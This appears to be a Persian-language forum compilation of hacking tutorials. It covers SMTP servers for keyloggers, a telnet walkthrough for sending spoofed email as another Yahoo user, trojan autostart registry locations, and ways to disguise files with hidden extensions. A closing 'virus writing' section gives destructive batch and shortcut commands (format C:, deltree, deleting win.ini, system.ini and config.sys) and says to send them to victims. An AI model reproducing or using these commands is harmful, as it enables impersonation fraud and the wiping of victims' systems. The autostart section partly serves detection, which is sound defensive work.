فیک میلر

به دلیل درخواست زیاد چند تا از دوستان که میخواستن ببینن برای کیلاگری که میسازند از چه smtp باید استفادهخ کنند این اموزش رو گذاشتم

smpt جدید هات میل:mx01.hotmail.com

SMTP های جدید یاهو به قرار زیر است:

e.mx.mail.yahoo.com
f.mx.mail.yahoo.com
g.mx.mail.yahoo.com
a.mx.mail.yahoo.com
b.mx.mail.yahoo.com
c.mx.mail.yahoo.com
d.mx.mail.yahoo.com

mta125.mail.re4.yahoo.com

mta119.mail.re1.yahoo.com 

 mta144.mail.re1.yahoo.com

 mta249.mail.mud.yahoo.com

1- یکی از ساده ترین راهها استفاده از سایتهایی مثل google است که با جستجوی عبارت SMTP Server، هزاران سرور پیدا کنیم.
2- استفاده از SMTP Server سایت دانشگاهها. تجربه برایم ثابت کرده که این روش یکی از بهترینهاست.
3- استفاده از یکسری SMTP Server های مشهور. این روش هم بد نیست.

حالا روش را عملاً نشانتان میدهم:
اول باید یک سرور را مشخص کنید که از طریق آن می خواهید Fake Mail را بفرستید. همانطور که قبلاً گفتم، اگر مثلاً می خواهید برای یک نفر که Mail Box او در یاهو است، Fake Mail بزنید، سرور را همان سرور در نظر بگیرید یعنی از خود yahoo.com برای ارسال استفاده کنید. بعد باید ببینید که در این سرور کدام subdomain باید استفاده کنید (یعنی اینکه SMTP Server سرور آدرسش، mail.yahoo.com است یا mx.yahoo.com است یا چیز دیگر). برای این کار دو روش را میگوم:

1- از nslookup استفاده کنیم:
اول باید با whois یک Name Server پیدا کنیم و بعد از طریق آن، سایت را nslookup کنیم. مثلاً میخواهم SMTP Server مربوط به KsN.com را پیدا کنم. اول یک whois میکنم و می بینم که Name Server سایت، s1.sazin.com و s2.sazin.com است. حالا nslookup میکنم و آن سطرهایی را می خوانم که با نام MX مشخص شده است و دو تا آدرس می بینم که عبارتند از: KsN.com و mail.KsN.com پس SMTP Server های سایت KsN.com همین دو آدرس است. در نتیجه اگر بخواهم از سایت KsN.com برای ارسال Fake Mail استفاده کنم، از این آدرسها باید بهره گیرم.

2- استفاده از بعضی سایتهای خاص:
یکی از این سایتها، http://www.mob.net/~ted/tools/mx.php3 است. در این سایت، نام سایت را می نویسید و دکمه lookup را کلیک میکنید. مثلاً من نوشتم yahoo.com و به نتایج زیر رسیدم:

Domain Server: ns.mob.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

مشخص است که SMTP Server های سایت yahoo.com عبارتند از:
mx1.mail.yahoo.com, mx2.mail.yahoo.com, mx4.mail.yahoo.com

فرستادن ایمیل جعلی از طریق تلنت

فرستادن ایمیل جعلی از طریق تلنت

هر سرور برای ارسال ایمیل از پروتکل SMTP استفاده میکنه. این پروتکل توانایی خواندن E-mail را نداره و فقط می‌تونه E-mail بفرسته.پورت ۲۵ : این پورت ۲۵ برای ارسال E-mail به‌کار می‌ره و این پورت از برنامه های SMTP Server برای ارسال استفاده می کنه. برای صحبت کردن با پورت ۲۵ اول باید یک Server پیدا کنیم که پورت ۲۵ در آن باز باشه و بعد باید طبق معمول از telnet برای ارتباط استفاده کنیم.
SMTP Server ها اهمیتی نمی‌دهند که شما کی هستید و به کی می‌خواهید میل بزنید، بلکه فقط کار خود را می‌کنند. پس به هر آدرس توجه کامل نکنین، شاید جعلی باشه   چگونه یک SMTP سرور پیدا کنیم :
کار سختی نیست. ولی ما توصیه می‌کنم از سروری کمک بگیرین که مربوط به Mail Box قربانی است. SMTP Server در نهایت روی یک سرور قرار دارد پس در حتما آدرس آن چیزی مثل smtp.noavar.com، mx01.hotmail.com و ... هست.
سایت‌ google رو باز کنید و عبارت SMTP Server را سرچ کنین. هزاران سرور پیدا می کنین.زود برین به آدرس http://www.mob.net/~ted/tools/mx.php3 بعد نام سایت را می‌نویسین و دکمه lookup را کلیک می‌کنین.(مثلا yahoo.com ) و می بینین:
Domain Server: ns.cw.net
yahoo.com mail is handled by 5 mx4.mail.yahoo.com.
yahoo.com mail is handled by 1 mx1.mail.yahoo.com.
yahoo.com mail is handled by 1 mx2.mail.yahoo.com.
مشخصه که SMTP Server های سایت yahoo.com عبارتند از: mx1.mail.yahoo.com , mx2.mail.yahoo.com , mx4.mail.yahoo.com
 خوب حالا میخوایم به یه نفر (مثلا ای میل بزنیم و میخوایم که طرف خیال کنه که از طرف test_zabet@yahoo.com است. (هر دو در سایت یاهو)  برای این کاراز telnet برای برقراری ارتباط استفاده می کنم. دستور زیر را در اعلان داس تایپ کنین.
telnet mx1.mail.yahoo.com 25
۲۵ همون شماره پورت ای میل هست و از سرور اصلی یاهو هم استفاده کردیم.خوب حالا شما باید این رو بینین:
220 YSmtp mta499.mail.yahoo.com ESMTP service ready
دقت کنید که چون از telnet استفاده می‌کنین، چیزهایی را که تایپ می‌کنین، نمی‌بینین و نمی‌تونید از دکمه BackSpace استفاده کنین.تایپ کنین HELO yahoo.com و جواب می‌شنویم: 250 mta499.mail.yahoo.com
حالا باید مشخص کنم که E-mail فرستنده چیه. پس می‌نویسم: MAIL FROM:test_zabet@yahoo.com
حالا باید بگم که این E-mail به چه آدرس ارسال بشه مثلآ RCPT TO: yaftz@yahoo.com
 وDATAحالا باید بنویسم  Enter بزنم و جواب می‌شنوم:354 go ahead
 اینجا وقت تایپ کردن یک سری چیز‌های اساسی است. اول می‌نویسم
From: R D test_zabet@yahoo.com این همان اسمی است که به عنوان Sender یا همان From دیده میشه. حالا می‌نویسم:salam و بعد Subject این هم در آن E-mail به عنوان subject دیده میشه.
MIME-Version: 1.0
Content-Type: text/plain;
خوب دوبار Enter زده و متن نامه را می‌نویسم:
دقت کنید که یک . (نقطه) در سطر آخر بنویسید و بعد Enter بزنید. با این روش به پورت ۲۵ میگیدکه متن نامه تمام شده.
می‌نویسم QUIT تا ارتباط قطع و از telnet خارج بشیم

فایل های INI. چه هستند؟

فایل های INI. چه هستند؟

این فایل ها در حقیقت فایل های متنی (TXT) ساده هستند، که بوسیله برنامه Notepad می توان یک فایل (TXT) را به سادگی ایجاد کرد.  این فایل ها بوسیله ویندوز و برنامه های تحت ویندوز مورد استفاده قرار می گیرند تا اطلاعاتی در مورد خواسته های شما و محیط عملکرد خود ذخیره کنند. INI. مخفف initialization است.

ساختار فایل INI.:

فایل INI. شامل یک یا چند بخش است هر بخش با یک نام بخش (section name) آغاز می شود که ممکن است، هیچ یا چندین ورودی وجود داشته باشد. که بعد از آن قرار می گیرد.

[بخش]

ارزش=نام کلید

اگر توضیحی وجود داشته باشد بعد از «سمی کالن» (;) قرار می گیرد.

ویندوز از چندین استاندارد برای فایل های INI. استفاده می کند تا اطلاعات پیکر بندی کامپیوتر را ذخیره کند. فایل هایی که این اطلاعات را نگهداری می کنند عبارتند از :

WIN.INI, SYSTEM.INI, PROGMAN.INI, PROTOCOL.INI, SHARED.INI, WINFILE.INI, CONTROL.INI, SCHDPLUS.INI

نرم افزارهای تحت ویندوز هم بعد از نصب شدن ممکن است قسمتهایی به WIN.INI اضافه کنند و همچنین خود فایل های INI. به دایرکتوری ویندوز اضافه کنند.

ایجاد تغییرات در فایل های INI.

چون فایل های INI. از یک متن ساده استفاده می کنند. بوسیله یک برنامه متنی ساده مانند Notepad می توانند ویرایش شوند.

همانطور که در شماره قبل وعده داده بودیم، در این شماره به بررسی روشهای مختلف به کار گرفته شده توسط ترواها برای اجرا شدن با هر بار اجرای ویندوز می پردازیم تا بتوانیم از این طریق آنها را شناسایی و حذف کنیم. اگرچه به روشهای قدیمی هم اشاره مختصری خواهیم کرد، فقط به بررسی روشهای امروزی می پردازیم. با اینکه در مورد حذف ترواها بعداً بیشتر خواهیم نوشت، پس از مطالعه این مقاله شما باید بتوانید نه تنها ترواها، بلکه سایر برنامه های احتمالاً مزاحمی را که با هر بار اجرای ویندوز شما خود را اجرا می کنند بیابید. اگرچه این متن کمی تخصصی به نظر می رسد، اصلاً وحشت نکنید، یکبار آن را با حوصله بخوانید و سپس بار دوم ضمن خواندن متن، کارهای نوشته شده در آن را انجام دهید.

 روشهای مختلفی که یک برنامه می تواند از طریق آنها خود را با هر بار اجرای ویندوز اجرا کند عبارتند از:

 1- استفاده از winstart.bat: در این روش که مناسب ویندوزهای قدیمی است، فایلی به نام winstart.bat در شاحه ویندوز ساخته می شود و برنامه از این فایل فراخوانی می شود؛ به این صورت که اگر این فایل موجود نباشد ساخته می شود و در غیر این صورت فقط نام برنامه به آن اضافه می شود.

2- استفاده از win.ini: در این روش که امروزه زیاد مورد استفاده قرار نمی گیرد، با نوشتن عبارت load=filename.exe (که به جای filename.exe نام برنامه قرار می گیرد) یا Run=filename.exe در قسمت [windows]، برنامه مورد نظر با هر بار اجرای ویندوز اجرا خواهد شد. برای باز کردن فایل Win.ini و مشاهده محتویات آن، بهترین روش استفاده از برنامه System configuration editor ویندوز است. برای اجرای این برنامه از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید)، تایپ کنید SysEdit و OK را فشار دهید. از بین فایلهای باز شده فایل مورد نظر را پیدا کنید. اگر دقیقاً با این فایلها آشنایی ندارید، مواظب باشید که تغییری در این فایلها ندهید و اگر دادید، تغییرات خود را ضبط نکنید.

 3- استفاده از System.ini: این روش بسیار مشابه روش بالاست. و مانند بالا این فایل هم درون System configuration editor قابل مشاهده است. اگر در این فایل به عبارتی مشابه shell=Explorer.exe trojan.exe برخورد کردید، سیستم شما بلافاصله پس از اجرای explorer.exe، trojan.exe را اجرا خواهد کرد.

 4- استفاده از Start up: هر برنامه ای که در منوی Start داخل قسمت Startup قرار بگیرد، با هر بار اجرای ویندوز خود به خود اجرا خواهد شد. Startup در ویندوزهای جدیدتر در قسمت All programs منوی Start قرار دارد.

 5- استفاده از رجیستری: این روش که در حال حاضر متداولترین روش مورد استفاد ترواها و کرمها می باشد به این صورت است که نام فایل اجرایی به قسمت Run در رجیستری اضافه می گردد. رجیستری ویندوز حاوی اطلاعات مختلفی از سخت افزارها و نرم افزارهای گوناگون نصب شده روی سیستم شماست. برای مشاهده رجیستری، از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید) و در داخل جعبه متن آن تایپ کنید: RegEdit و OK را فشار دهید. اگر دقیقاً با رجیستری آشنایی ندارید، مواظب باشید که تغییری در آن ندهید. از میان قسمتهای مختلف رجیستری در اینجا ما با HKEY_CURRENT_USER و HKEY_LOCAL_MACHINE سروکار داریم. یکی از ایندو را انتخاب کنید و روی آن Double Click کنید (یا روی علامت + کنار آن کلیک کنید) حال به ترتیب گزینه های زیر را انتخاب کنید تا به Run برسید:

Software -> Microsoft -> Windows -> Current Version -> Run

      در شرایطی که بیش از یک نفر از یک رایانه استفاده می کنند و روی آن کاربران مختلف تعریف کرده اند، معمولاً برنامه هایی که در قسمت Run موجود در HKEY_LOCAL_MACHINE نامشان نوشته شده باشد با هر بار اجرای ویندوز برای تمام کاربران آن اجرا می شوند اما برنامه هایی که نام آنها در HKEY_CURRENT_USER آمده باشد فقط برای کاربری که در حال حاضر از سیستم استفاده می کند اجرا خواهند شد.

       ممکن است علاوه بر Run، گزینه هایی به نامهای RunOnce، RunServices یا RunServicesOnce را هم دیده باشید که آنها هم همین اثر را دارند با این تفاوت که اگر نام برنامه ای در RunOnce یا RunServicesOnce قرار بگیرد فقط یکبار یعنی فقط دفعه بعدی که ویندوز اجرا می شود به همراه ویندوز اجرا خواهد شد.

       6- روش ShellOpen رجیستری: در رجیستری و در زیر کلیدهای زیر باید همیشه عبارت "%1" %* نوشته شده باشد اما اگر به عبارتی مانند trojan.exe "%1" %*  برخورد کردید، بدانید که فایل Trojan.exe سعی دارد کاری کند با هر بار اجرای هر فایل اجرایی روی رایانه شما، او هم اجرا شود:

  [HKEY_CLASSES_ROOT\exefile\shell\open\command]

  [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]

       7- استفاده از روشهایی مانند  Binding و جایگزینی: اگرچه روشهایی که در بالا نوشته شد حاوی تمامی روشهایی است که امروزه مورد استفاده قرار می گیرند، روشهای اجرا هرگز به موارد فوق ختم نمی شوند و همیشه جای ابتکار یا استفاده از روشهایی که فقط روی سیستمها یا در شرایط خاصی عمل کنند باز است بنابراین به صرف اینکه مطمئن شوید از طریق روشهای بالا سیستم شما آلوده نشده است کفایت نمی کند. به عنوان نمونه در روشهایی مانند  Binding و جایگزینی که هنوز چندان مورد استفاده قرار نگرفته و پیش بینی می شود در آینده نزدیک بیشتر مورد استفاده قرار بگیرند، فایلی که قرار است با هر بار اجرای ویندوز خود را اجرا کند، فایل دیگری را پیدا می کند که این کار را انجام دهد و سپس خود را به آن می چسباند. به عنوان نمونه با تشخیص اینکه روی سیستم، فایل مربوط به ویندوز مسنجر با هر بار اجرای ویندوز اجرا می شود، کاری می کند که در هنگام اجرای ویندوز مسنجر، آن برنامه هم اجرا شود. اگر برنامه برای این کار خود را به فایل اجرایی مسنجر ویندوز بچسباند، می گویند از Binding استفاده کرده است اما اگر خود را جایگزین آن کند، می گویند از روش جایگزینی استفاده کرده است. اگرچه این روشها از قدیم توسط ویروسهای مختلف برای آلوده کردن فایلهای اجرایی به کار گرفته می شدند اما استفاده از این روش برای اجرای همزمان با ویندوز احتمالاً به زودی بیشتر مورد استفاده قرار خواهد گرفت.

      پس از مطالعه روشهای بالا، احتمالاً شما هم با من هم عقیده هستید که پیدا کردن یک تروا به روش دستی کار چندان ساده ای نیست؛ اما اکثریت قریب به اتفاق ترواها از روشهای رجیستری استفاده می کنند و شما از تغییرات ایجاد شده در قسمتهای Run می توانید به آلوده شدن سیستم پی ببرید. یک ابزار بسیار عالی که در اکثر ویندوزها وجود دارد (در ویندوز 2000 وجود ندارد) ابزاری به نام System Configuration Utility است. برای اجرای این ابزار، از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید) و در داخل جعبه متن آن تایپ کنید: MSConfig و OK را فشار دهید. اگرچه این ابزار کاربردهای مختلفی دارد، ما در اینجا فقط به ذکر کاربردهایی از آن می پردازیم که به موضوع بحث ما بیشتر مربوط هستند. پس از باز شدن صفحه System Configuration Utility، از بالای صفحه Startup را انتخاب کنید. خواهید دید که اکثر فایلهایی که خود به خود همراه ویندوز شما اجرا می شوند در اینجا لیست شده اند و شما با حذف تیک کنار اسم آنها می توانید آنها را از کار بیندازید. در قسمت Startup item نامی که برنامه برای خود برگزیده است، در قسمت command، آدرس فایل اجرایی برنامه و در قسمت Location تکنیک مورد استفاده توسط برنامه برای اجرا را خواهید دید. توجه به نکات زیر هم در استفاده از MSConfig به شما کمک خواهد کرد:

1- چون معمولاً قسمتهای command و location فضای کافی برای نمایش کامل محتویات خود را ندارند، موش رایانه را روی خط جداکننده command از location یا خط انتهای location ببرید تا بتوانید اندازه این قسمتها را تغییر دهید.

 2- عبارتهای HKCU و HKLM به ترتیب مخفف HKEY_LOCAL_MACHINE و HKEY_CURRENT_USER می باشند که در بالا و در تکنیک شماره 5 به آنها اشاره شد.

 3- برای مشاهده فایلهای System.ini و win.ini، علاوه بر روش گفته شده در بالا (در مورد شماره 2) کافی است که از قسمت بالای MSConfig گزینه های SYSTEM.INI و WIN.INI را انتخاب کنید. 

ترفندهای هکرها-فایلهایی نظیر win.ini

در این روش می توان فایل را در قسمت C:WindowsStartMenuProgramsstart کپی کرد البته شاخه ها مانند C:Windows متغییر است و بنا به دایرکتری نصب ویندوز شما فرق می کند .

روش 2
فایل Win.ini است ::
این فایل هم قدرت اجرایی دارد . مانند ::
run= trojan
NullPort=None
BaseCodePage=1256

روش 3
استفاده از فایل System.ini می باشد :
اگر شما پیدا کردید کد shell=Explorer.exe trojan.exe زیر را فایل trojan.exe بعد از Explorer.exe اجرا خواهد شد

پسوندهای پنهان فایلهای ویندوز
ممکن است از این موضوع آگاهی نداشته باشید، اما حتی اگر به ویندوز بگویید که تمام پسوندهای فایل را نشان دهد، هنوز هم فایلهایی وجود دارند که بطور پیش فرض مخفی شده‌اند. همچنین هر برنامه نصب شده‌ایی می‌تواند پسوندها را پیکربندی کند تا پنهان شوند. در اینجا در مورد چگونگی انجام این کار و همچنین دلیل اینکه چرا برخی از پسوندهای پنهان می‌توانند برای تعدادی از کاربرهای کامپیوتر خطرناک باشند، مثالهایی آورده شده است. به فرض اینکه شما قبلا ویندوز explorer را برای نشان دادن تمام پسوندهای پیکربندی کرده‌اید.

پسوندهای SHS
یک کپی از notepad.exe بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید. روی notepad.exe کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی notepad.exe کلیک کنید و آن را به عقب به سمت desktop بکشید. فایلی را که ایجاد شده است (Scrap) به Readme.txt تغییر نام دهید.

حالایک آیکن که نشان دهنده سند متنی است و فایلی با نام مشخص readme.txt بر روی desktop شما وجود دارد کلیک کردن بر روی فایل فوق باعث می‌شود notepad باز ‌شود. اگر این فایل یک Trojan باشد، شما فریب خورده‌اید و توسط آنچه که یک فایل متنی بی‌خطر بنظر می‌رسید آلوده شده‌اید. اگر اجازه نمایش این پسوند داده می شد شما فریب فایل Readme.txt.shs را نمی‌خوردید.

پسوندهای PIF
اگر سعی کنید تا notepad.exe را به anything.txt.pif تغییر نام دهید، تنها فایلی با نام anything.txt روی desktop خود خواهید دید. و این بدین دلیل است که PIF پسوند دیگری است که ویندوز بطور پیش فرض پنهان می‌کند. اگر شما فایل را اجرا کنید برنامه اجرا خواهد شد، به خاطر اینکه ویندوز پسوندهای PIF را اجرا خواهد کرد حتی اگر آنها فایلهای اجرایی باشند.

پسوندهای SCR
پسوند دیگری که باید مراقب آن بود SCR است. کپی notepad.exe خود را به notepad.scr تغییر نام دهید و روی آن کلیک کنید. Notepad به عنوان یک فایل اجرایی اجرا خواهد شد. بسیاری از افراد توسط هکرهایی فریب می‌خورند که account یک قربانی را بدست آورده‌اند. هکر email یا هر نوع پیغامی را به تمام دوستان قربانی می‌فرستد که “این صفحه نمایش جدید و بامزه را ببینید از خنده روده بر خواهید شد!” از آنجایی که این پیغام از یک منبع مطمئن آمده، اکثر افراد فریب خورده و فایل SCR را اجرا می‌کنند که در نهایت به هکری ختم می‌شود که به کامپیوتر شما متصل شده است.

فرمانهای خطرناکی که می‌توانند گنجانده شوند
پسوندهای میانبر PIF
برخی از پسوندهای پنهان فایل قادرند به سادگی با فرمانهای پنهان شده‌ای که می‌توانند برای سیستم شما مخرب باشند برنامه‌ریزی شوند. این یک آزمایش ساده است:

دکمه راست ماوس خود را روی desktop کلیک کنید و New و سپس Shotcut را انتخاب نمایید. در Command line تایپ کنید:
format a:/autotest
Next را کلیک کنید. در “Select a name for the shortcut” تایپ کنید: readme.txt سپس Next را کلیک کنید. یک آیکن notepad را انتخاب کرده و Finish را کلیک کنید. حالا شما در desktop خود فایلی با نام readme.txt و با آیکن notepad دارید. مطمئن شوید که در درایو شما دیسکی است که از دست دادن آن برای شما اشکالی ندارد و روی آیکن کلیک کنید. فایلی که شما روی آن کلیک کرده‌اید درایو A: را فرمت خواهد کرد. البته آیکن هکر درایو دیگری را مورد هدف قرار خواهد داد یا ممکن است نامی همچون ‘game.exe’ و فرمانی برای حذف کردن دایرکتوری ویندوز شما یا (deltree /y C:\*.*) کل درایو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فریب شما نخواهد بود.

پسوند SHS
فایلهای Scrap نیز می‌توانند فرمانهای گنجانده شده را پنهان کند. این یک آزمون ساده است: از notepad.exe یک کپی بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید.Notepad.exe را کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی Edit کلیک کنید و Package Object و سپس Edit package را انتخاب کنید. روی Edit و سپس Command Line کلیک کنید.
در کادر، دستوری مانند format a:/autotest را تایپ کنید و روی OK کلیک کنید. آیکن نیز می‌تواند از این پنجره تغییر یابد. از پنجره خارج شوید، این کار سند را به روز خواهد کرد. روی notepad.exe کلیک کنید و آن را به عقیب به سمت Desktop بکشید. فایلی را که ایجاد شده (Scrap) به Readme.txt تغییر نام دهید.

حالا شما آنچه را که شبیه یک فایل متنی است دارید. اگر این فایل اجرا شود درایو A: را فرمت خواهد کرد. همانگونه که در مثال بالا برای پسوندهای میانبر PIF دیده شد، هکر می‌تواند از فرمانهای خطرناکتری استفاده کند.

روشهای Trojan در هنگام راه اندازی
روشهای راه اندازی استاندارد
اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده می‌کنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راه‌اندازی خواهد داشت، بگونه‌ای که در زمان راه‌اندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راه‌اندازی شامل کلیدهای اجرایی registry، فولدر راه اندازی ویندوز، Windows Load= یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز می‌باشند.

روشهای راه اندازی خطرناک
از آنجایی که فقط تعداد اندکی از این روشهای راه اندازی وجود دارند، هکرهای زیادی را یافته‌ایم که در پیدا کردن روشهای جدید راه‌اندازی افراط می‌کنند. این شامل استفاده از تغییرات خطرناکی در سیستم registry می‌باشد، که در صورتی که فایل Trojan یا فایل همراه آن از بین برود سیستم را بصورت بلااستفاده درخواهد آورد. این یک دلیل استفاده نکردن از نرم افزار ضد ویروس برای از بین بردن Trojanهاست. اگر یکی از این روشها استفاده شود، و فایل بدون ثابت کردن registry سیستم از بین برود، سیستم شما قادر به اجرای هیچگونه برنامه‌ای پس از راه اندازی مجدد کامپیوترتان نخواهد بود.
قبل از آنکه سراغ registry برویم لازم به توضیح است که یک فولدر به صورت C:\WINDOWS\StartMenu\Program\StartUp وجود دارد که هر فایلی در اینجا باشد هنگام راه اندازی ویندوز اجرا خواهد شد.توجه داشته باشید که هرگونه تغییری می‌تواند سیستم شما را به خطر بیاندازد بنابراین، هرچه ما می‌گوییم انجام دهید. برای دستیابی به registry به منوی start>run> بروید و “regedit” را بدون علامت ” ” تایپ کنید. در registry چندین مکان برای راه اندازی Startup وجود دارد که لیستی از آنها را در اینجا می آوریم.

[HKEY_CLASSES_ROOT\exefile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\comfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command]=”\”%1\” %*”
[HKEY_CLASSES_ROOT\piffile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command]=”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command]=”\”%1\”%*”
اگر این کلیدها مقدار “\”%1\”%*” را نداشته باشند و به جای اجرای فایل در هنگام راه اندازی به “\”Server.exe %1\” %*” تغییر یابد به احتمال زیاد یک Trojan است.
روش راه اندازی ICQ
روشی راه اندازی دیگری که امروزه استفاده از آن معمول است شناسایی شبکه ICQ می‌باشد. بسیاری از کاربران ICQ نمی‌دانند که هکر می‌تواند یک خط پیکربندی را به ICQ اضافه نماید تا با هر بار بارگذاری شدن برنامه Trojan نیز راه اندازی شود. به عنوان آزمایش مراحل زیر را انجام دهید:
ICQ را باز کنید. روی آیکن ICQ کلیک کنید و preference را انتخاب نمایید. روی Edit launch List کلیک کنید. روی Add کلیک کنید. روی Browse کلیک کنید. فایلی را برای اضافه کردن به Windows\notepad.exe بیابید که به کار این آزمایش بیاید. روی Open و سپس OK کلیک کنید. زمانی که شما ICQ را راه اندازی مجدد می‌کنید فایل اجرا خواهد شد.

درست کردن پوشه بی نام و نشان:

در این ترفند شما بدون استفاده از Hidden کردن پوشه ای خود را محو کنید!
ابتدا پوشه مورد نظر را انتخاب کنید و بعد کلیک راست کرده و Rename را انتخاب کنین , سپس Alt را نگه داشته و با استفاده از اعداد سمت راست کیبورد عدد 255 را تایپ کنید و Enter را فشار دهید.خواهید دید که پوشه ای مورد نظر بی نام است .
حال روی پوشه ای مورد نظر کلیک راست کرده و Properties را انتخاب کنید از صفحه ای باز شده Customize را انتخاب کنید و بعد روی Chang Icon کلیک کنید و در صفحه ای باز شده یک آیکن بیرنگ انتخاب کنید خواهید دید که پوشه مورد نظر کاملا محو شده است!

آموزش ویروس نویسی

آموزش ساختن ویروس [ویروس نویسی]

امروز میخوام آموزش ساختن یه ویروس رو بهتون یاد بدم. این ویروس هم مثل بلستر پس ازاجرا با دادن مدت زمان  30  ثانیه کامپیوتر شما رو خاموش میکنه. برای ساختن این ویروس ابتدا روی صفحه دسکتاب راست کلیک کنید. سپس new  و بعد از اون text document  رو انتخاب کنید. سپس وارد این فایل متنی شده و این عبارت رو تایپ کنید. Shutdown –r حالا از منوی فایل save as  رو انتخاب کنید. در قسمت file name  اسم فایل رو مشخص کنید. توجه کنید که این اسم حتما با پسوند bat  باشه.مثل rockboys.bat در قسمت encoding  شما باید ANSI  رو انتخاب کنید. حالا save  کنید. شما میتونید این فایل رو روی خودتون اجرا کنید و نتیجه کار رو ببینید. برای اینکه از  خاموش شدن کامپیوترتون جلوگیری کنید  کافیه در قسمت run  عبارت زیر رو تایپ کنید. Shutdown –a

آموزش ساختن بد ترین وآزاردهنده ترین ویروس در دنیا (Blastr&saser) [ویروس نویسی]

1. روی دسک تاپ رایت کلیک کنید وازگزینه ی new - text document را انتخاب کنید. 2. حالا وارد text document  شوید ودر آن عبارت زیررا تایپ کنید. cpu_567hjkblaster 3. بعد از سیو کردن آنرا rename   کرده و اسمی برایش انتخاب کنید. حالا اگه فایل رو اجرا کنید باید فاتحه ی cpu رو بخونین.

اینم یه ویروس باحال در win xp : [ویروس نویسی]

یه  Text Document  باز کنید و بعد این کامند رو توش بنویسید :                                            :c del autoexec.bat del config.sys cd winnt del system.ini del win.ini بعد فایل رو با پسوند bat  .سیو کنید. مثل این : nofooz.bat این فایل رو وقتی برای  کسی بفرستید هیچی نمیشه  ولی وقتی اجراش کنه و کامپیوترش رو ریست کنه دیگه ویندوزش بالا نمیاد . من ویروس رو برای راحتی کارتون گذاشتم ولی مواظب باشید خودتون اجراش نکنید .

نوشتن یه ویروس ساده ولی خطرناک [ویروس نویسی]

این ویروس چیز سختی نیست ولی خیلی خطرناکه.  اول از همه روی دسکتاپ رایت کلیک کنید بعدش New ShortCut  بسازید. یه صفحه باز میشه در اون بنویسید: Format C:/Autotest سپس Next  را زده و در صفحه جدید که باز میشه یه اسم واسه ویروستون انتخاب کنید. سپس Next  را زده ویه آیکون با سلیقه خودتون برای اون انتخاب کرده و Finish  کنید. خب دیگه کارمون تمومه حالا اگه اجراش کنین بیچاره میشین. اگه خواستین بفهمین چی میشه به جای Format C:/autotest  بنویسید Format a:/autotest  و یه فلاپی که حاوی اطلاعات هستش در Flopy Drive  خود قرار دهید بعد اجراش کنید بعد برین سراغ فلاپیتون ببینید چی شده.میبینید فلاپی پاک شده ودیگه نه میشه اطلاعات روش ریخت ونه میشه فرمتش کرد.

ویروسی که شناسایی نمیشه [ویروس نویسی]

سلام دوستان امروز با یه آموزش بسیار خفن اومدم این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه برای ساختن این ویروس مراحل زیر رو انجام بدید به نوت پد رفته و این عبارت رو بنویسید del autotexec.bat del config.sys cd winnt del system.ini del win.ini بعد اونو با فرمت bat  سیو کنین و برای قربانی بفرستین

یک ویروس برای فرمت کردن درایو C شخص مورد نظر [ویروس نویسی]

برنامه NotePad  رو باز کنین بعد فرمان زیر رو توش کپی و پیست کنید:    @echo off  call attrib -r -h c:autoexec.bat  >nul  echo @echo off  >c:autoexec.bat  echo format /autotest  c:/q>nul  >>c:autoexec.bat  call attrib +r +h c:autoexec.bat  >nul  exit حالا فایل را با پسوند bat  ذخیره کنین. مواظب یاشین که فایل رو اجرا نکنین چون کل اطلاعات درایو سی شما پاک می شه!    این فایل چه کار می کنه؟  اول کل اطلاعات موجود تو فایل autoexe.bat  رو پاک می کنه بعد کد format /autotest c:/q  رو توش می زاره وقتی هدف شما کامپیوتر رو ریست و دوباره راه اندازی کنه این کد اجرا می شه و درایو سی فرمت می شه! ------------------------ راستی اگه هم بخواین تعداد و نام پارتیشن مورد نظر رو با کمی تغییر توی فرمان ها می تونین تعیین کنین

آموزش ساخت یک ویروس که اگر اجرا بشه پس از ریست ، کامپیوتر دیگه بالا نمیاد... [ویروس نویسی]

